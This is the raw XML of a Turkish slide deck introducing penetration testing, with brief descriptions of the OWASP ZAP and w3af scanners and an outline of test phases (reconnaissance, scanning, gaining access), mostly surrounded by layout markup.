            <p:cNvPr id="312" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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47" name="Serbest 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348" name="Grup 347"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1588" y="3799401"/>
            <a:ext cx="4386410" cy="3084511"/>
            <a:chOff x="-1588" y="4419600"/>
            <a:chExt cx="3504440" cy="2464312"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="349" name="Grup 156"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="-321" y="4419600"/>
              <a:ext cx="2827754" cy="2458133"/>
              <a:chOff x="437" y="-367"/>
              <a:chExt cx="5799" cy="5041"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="375" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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350" name="Grup 349"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1">
              <a:off x="2055224" y="5313306"/>
              <a:ext cx="1134584" cy="955223"/>
              <a:chOff x="3900133" y="5425719"/>
              <a:chExt cx="1778554" cy="1449268"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="366" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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351" name="Grup 350"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1588" y="5362669"/>
              <a:ext cx="1522208" cy="1521243"/>
              <a:chOff x="-1588" y="5362669"/>
              <a:chExt cx="1522208" cy="1521243"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="359" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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352" name="Grup 351"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1808901" y="5856153"/>
              <a:ext cx="1693951" cy="1019100"/>
              <a:chOff x="1623186" y="-214403"/>
              <a:chExt cx="1171187" cy="716005"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="353" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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58" name="Serbest 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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="422" name="Grup 52"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="19948164">
            <a:off x="369246" y="506291"/>
            <a:ext cx="892898" cy="1021771"/>
            <a:chOff x="4634" y="754"/>
            <a:chExt cx="1164" cy="1332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="423" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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431" name="Grup 52"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="5825446">
            <a:off x="11635759" y="394369"/>
            <a:ext cx="408172" cy="467084"/>
            <a:chOff x="4634" y="754"/>
            <a:chExt cx="1164" cy="1332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="432" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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39" name="Serbest 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440" name="Grup 66"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="23436" y="3048994"/>
            <a:ext cx="388175" cy="364678"/>
            <a:chOff x="3636" y="1964"/>
            <a:chExt cx="413" cy="388"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="441" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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48" name="Serbest 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2" name="Başlık 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2034904" y="828876"/>
            <a:ext cx="6058552" cy="3507549"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="6000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" noProof="0"/>
              <a:t>Asıl başlık stilini düzenlemek için tıklayın</a:t>
            </a:r>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3" name="Tarih Yer Tutucusu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{58CEB930-5414-4DB9-8D94-DC94379258AA}" type="datetime1">
              <a:rPr lang="tr-TR" noProof="0" smtClean="0"/>
              <a:t>23.10.2018</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slayt Numarası Yer Tutucusu 4"/>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p>
            <a:pPr rtl="0"/>
            <a:fld id="{460FC167-785F-4C15-AD53-ECDDB92EE978}" type="datetime1">
              <a:rPr lang="tr-TR" noProof="0" smtClean="0"/>
              <a:t>23.10.2018</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slayt Numarası Yer Tutucusu 3"/>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097280" y="1188720"/>
            <a:ext cx="3108960" cy="2286000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3400" b="0"/>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4480560" y="457200"/>
            <a:ext cx="6675120" cy="5943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E4DDCDFA-F0F8-4CC6-9AC9-1DC6A8E77160}" type="datetime1">
              <a:rPr lang="tr-TR" noProof="0" smtClean="0"/>
              <a:t>23.10.2018</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slayt Numarası Yer Tutucusu 6"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Başlık 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1188720"/>
            <a:ext cx="3108960" cy="2286000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3400" b="0"/>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31226980-CC3C-4087-A726-DB85130DE069}" type="datetime1">
              <a:rPr lang="tr-TR" noProof="0" smtClean="0"/>
              <a:t>23.10.2018</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slayt Numarası Yer Tutucusu 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{CA8D9AD5-F248-4919-864A-CFD76CC027D6}" type="slidenum">
              <a:rPr lang="tr-TR" noProof="0" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR"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Serbest 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8" name="Serbest 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9" name="Serbest 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tr-TR" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Grup 66"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="11647687" y="947576"/>
            <a:ext cx="426645" cy="400819"/>
            <a:chOff x="3636" y="1964"/>
            <a:chExt cx="413" cy="388"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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18" name="Serbest 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19" name="Grup 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11308927" y="6212029"/>
            <a:ext cx="875471" cy="645972"/>
            <a:chOff x="7344986" y="5566058"/>
            <a:chExt cx="1750940" cy="1291943"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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26" name="Grup 5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2441" y="2873890"/>
            <a:ext cx="597228" cy="789302"/>
            <a:chOff x="2121" y="1060"/>
            <a:chExt cx="597" cy="789"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Serbest 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8" name="Serbest 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29" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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34" name="Grup 16"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="139505" y="-13010"/>
            <a:ext cx="1382907" cy="804244"/>
            <a:chOff x="1922" y="1129"/>
            <a:chExt cx="987" cy="574"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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39" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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43" name="Grup 28"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5007562"/>
            <a:ext cx="687853" cy="1147722"/>
            <a:chOff x="1901" y="2020"/>
            <a:chExt cx="1059" cy="1767"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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49" name="Serbest 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0" name="Serbest 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1" name="Serbest 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52" name="Grup 52"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="19948164">
            <a:off x="11143247" y="105148"/>
            <a:ext cx="675071" cy="772505"/>
            <a:chOff x="4634" y="754"/>
            <a:chExt cx="1164" cy="1332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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59" name="Serbest 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0" name="Serbest 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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="61" name="Grup 64"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="10782665" y="2958792"/>
            <a:ext cx="1028242" cy="1140705"/>
            <a:chOff x="2052" y="995"/>
            <a:chExt cx="768" cy="852"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="Serbest 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tr-TR" noProof="0" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Başlık Yer Tutucusu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5" name="Alt Bilgi Yer Tutucusu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pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" noProof="0" dirty="0"/>
              <a:t>Alt bilgi ekleme</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Tarih Yer Tutucusu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pPr rtl="0"/>
            <a:fld id="{4901B556-B979-4160-B665-FBDC7CC5A8AD}" type="datetime1">
              <a:rPr lang="tr-TR" noProof="0" smtClean="0"/>
              <a:t>23.10.2018</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slayt Numarası Yer Tutucusu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pPr rtl="0"/>
            <a:fld id="{CA8D9AD5-F248-4919-864A-CFD76CC027D6}" type="slidenum">
              <a:rPr lang="tr-TR" noProof="0" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" noProof="0"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g-tek.net/penetrasyon-testi" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bgasecurity.com/2017/09/10-soruda-sizma-testi/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ismailsaygili.com.tr/p/penetrasyon-testi.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66724" y="1054344"/>
            <a:ext cx="6058552" cy="3507549"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PENETRASYON TESTİ</a:t>
            </a:r>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B2F958E-F688-4A4E-88BE-20128B911466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1565952" y="1005213"/>
            <a:ext cx="9060096" cy="4847573"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP ZAP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Açık kaynaklı bir web uygulaması güvenlik tarayıcısıdır. Hem yeni uygulama güvenliği hem de profesyonel penetrasyon test cihazları tarafından kullanılmak üzere tasarlanmıştır. En aktif OWASP projelerinden biridir. Bir proxy sunucusu olarak kullanıldığında, kullanıcının HTTPS kullanan trafik de dahil olmak üzere içinden geçen tüm trafiği manipüle etmesine izin verir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>w3af (web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>application</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b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>attack</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b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and</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b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>audit</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b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>framework</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Açık kaynaklı bir web uygulaması güvenlik tarayıcısıdır. Proje, Web uygulamaları için bir güvenlik açığı tarayıcı ve sömürü aracı sağlamaktadır. Bu, penetrasyon testi sözleşmelerinde kullanım için güvenlik açıkları hakkında bilgi sağlar. Tarayıcı grafiksel kullanıcı </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>arayüzü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ve komut satırı </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>arayüzü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> sunmaktadır.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="358575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57A363-5EC7-4017-A0D6-5B49097DBF89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1308100" y="825500"/>
            <a:ext cx="9575800" cy="5232400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>                                     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1965960" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PENETRASYON TESTİ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1965960" lvl="6" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="3600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		AŞAMALARI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Dikdörtgen: Yuvarlatılmış Köşeler 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A66119D0-7A0C-4CEA-A687-D055A2F841FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1308100" y="800099"/>
            <a:ext cx="2032000" cy="133349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3200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>KEŞİF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Dikdörtgen: Yuvarlatılmış Köşeler 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{643DDB3C-B69A-4057-AAB5-0E4B40C4B0CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3065272" y="2575390"/>
            <a:ext cx="2032000" cy="12334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2800" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TARAMA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Dikdörtgen: Yuvarlatılmış Köşeler 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1E7584A-5257-44A2-B07A-F0758F93C133}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5190092" y="4254500"/>
            <a:ext cx="2032000" cy="1485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2700" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ERİŞİM KAZANMA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Dikdörtgen: Yuvarlatılmış Köşeler 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
